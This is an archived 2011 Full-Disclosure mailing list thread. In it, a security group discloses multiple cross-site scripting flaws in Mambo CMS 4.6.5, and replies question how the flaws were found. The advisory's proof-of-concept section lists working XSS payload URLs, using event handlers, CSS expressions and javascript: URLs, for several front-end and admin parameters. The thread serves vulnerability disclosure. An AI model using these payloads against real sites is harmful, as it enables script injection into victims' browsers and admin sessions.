subject:"\[Full\-disclosure\] Mambo CMS 4.6.x \(4.6.5\) \| Multiple Cross Site Scripting Vulnerabilities"

Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

2011-06-28 Thread Zach C.

On Mon, Jun 27, 2011 at 8:04 PM, YGN Ethical Hacker Group li...@yehg.netwrote:


 The XSS results are from purely blackbox scan on Mambo 4.6.5.


Wait, so you're telling me that you're running some program to find these
and then just reporting the results to this list? If so, please give some
credit to the program's author for actually finding these!

Or, if you mean you're just blindly throwing XSS attacks at random variables
hoping to find one that sticks... well, why hasn't a script been written for
this yet? (Or if one has, what's it called?)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

2011-06-27 Thread YGN Ethical Hacker Group

Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities



1. OVERVIEW

Mambo CMS 4.6.5 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Mambo is a full-featured, award-winning content management system that
can be used for everything from simple websites to complex corporate
applications. It is used all over the world to power government
portals, corporate intranets and extranets, ecommerce sites, nonprofit
outreach, schools, church, and community sites. Mambo's power in
simplicity also makes it the CMS of choice for many small businesses
and personal sites.


3. VULNERABILITY DESCRIPTION

Multiple parameters (task, menu, menutype, zorder, search, client,
section) are not properly sanitized, which allows attacker to conduct
Cross Site Scripting attack. This may allow an attacker to create a
specially crafted URL that would execute arbitrary script code in a
victim's browser.


4. VERSIONS AFFECTED

Tested on Mambo CMS 4.6.5 (current as of 2011-06-27)


5. PROOF-OF-CONCEPT/EXPLOIT

FrontEnd
==

param: task

http://attacker.in/mambo/index.php?option=com_contenttask=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20id=3Itemid=32


BackEnd
==

param: menu

http://attacker.in/mambo/administrator/index2.php?option=com_menumanagertask=edithidemainmenu=1menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20


param: menutype [hidden form xss, esp in IE 6,7 and older versions of Firefox]

http://attacker.in/mambo/administrator/index2.php?option=com_menusmenutype=xss%20style%3dx%3aexpression(alert(/XSS/))%20X
http://attacker.in/mambo/administrator/index2.php?option=com_menusmenutype=xss%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20X


param: zorder

http://attacker.in/mambo/administrator/index2.php?limit=10order%5b%5d=11boxchecked=0toggle=onsearch=simple_searchtask=limitstart=0cid%5b%5d=onzorder=c.ordering+DESC;scriptalert(/XSS/)/scriptfilter_authorid=62hidemainmenu=0option=com_typedcontent


param: search

http://attacker.in/mambo/administrator/index2.php?limit=10boxchecked=0toggle=onsearch=xss;scriptalert(/XSS/)/scripttask=limitstart=0hidemainmenu=0option=com_comment


param: client

http://attacker.in/mambo/administrator/index2.php?option=com_modulesclient=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27
NB: mouseover on banner link


param: section  [hidden form xss, esp in IE 6,7 and older versions of Firefox]

http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20style%3dx%3aexpression(alert(/XSS/))%20Xtask=editAhidemainmenu=1id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20Xtask=editAhidemainmenu=1id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20Xtask=editAhidemainmenu=1id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20Xtask=editAhidemainmenu=1id=2


6. SOLUTION

The vendor seems to discontinue the development. It is recommended to
use another CMS in active development.


7. VENDOR

Mambo CMS Development Team
http://mambo-developer.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-11-31: notified vendor through bug tracker
2011-06-27: no patched version released up to date
2011-06-27: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mambo4.6.x]_cross_site_scripting
Mambo CMS: http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip


#yehg [2011-06-27]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

2011-06-27 Thread Jacqui Caren-home

On 27/06/2011 09:15, YGN Ethical Hacker Group wrote:
 Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities


I thought these were found in Joomla ages ago?

Did you really test a code base that is a version of an old Joomla base
or did you look at the code, and test old Joomla bugs against it?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

2011-06-27 Thread YGN Ethical Hacker Group

 Did you really test a code base that is a version of an old Joomla base
No

 or did you look at the code, and test old Joomla bugs against it?
No


The XSS results are from purely blackbox scan on Mambo 4.6.5.


Joomla (Joomla! 1.0.0) was released on September 16, 2005. It was a
re-branded release of Mambo 4.5.2.3 which, itself, was combined with
other bug and moderate-level security fixes.

From that statement, it can be assumed that the code bases of Mambo
4.5.2.4 and higher  are different from those of Joomla! 1.1 and
higher.  As you can say so, we may sync old Joomla! 1.x bugs in Mambo
4.6.x. But it may be time-consuming to analyze the code changes and
validity of bugs in each version of both CMS.


https://secure.wikimedia.org/wikipedia/en/wiki/Joomla
http://www.joomla.org/announcements/general-news/154-introducing-joomla-10.html



 I thought these were found in Joomla ages ago?

No.



 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

[Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

4 matches

Site Navigation

Mail list logo

Footer information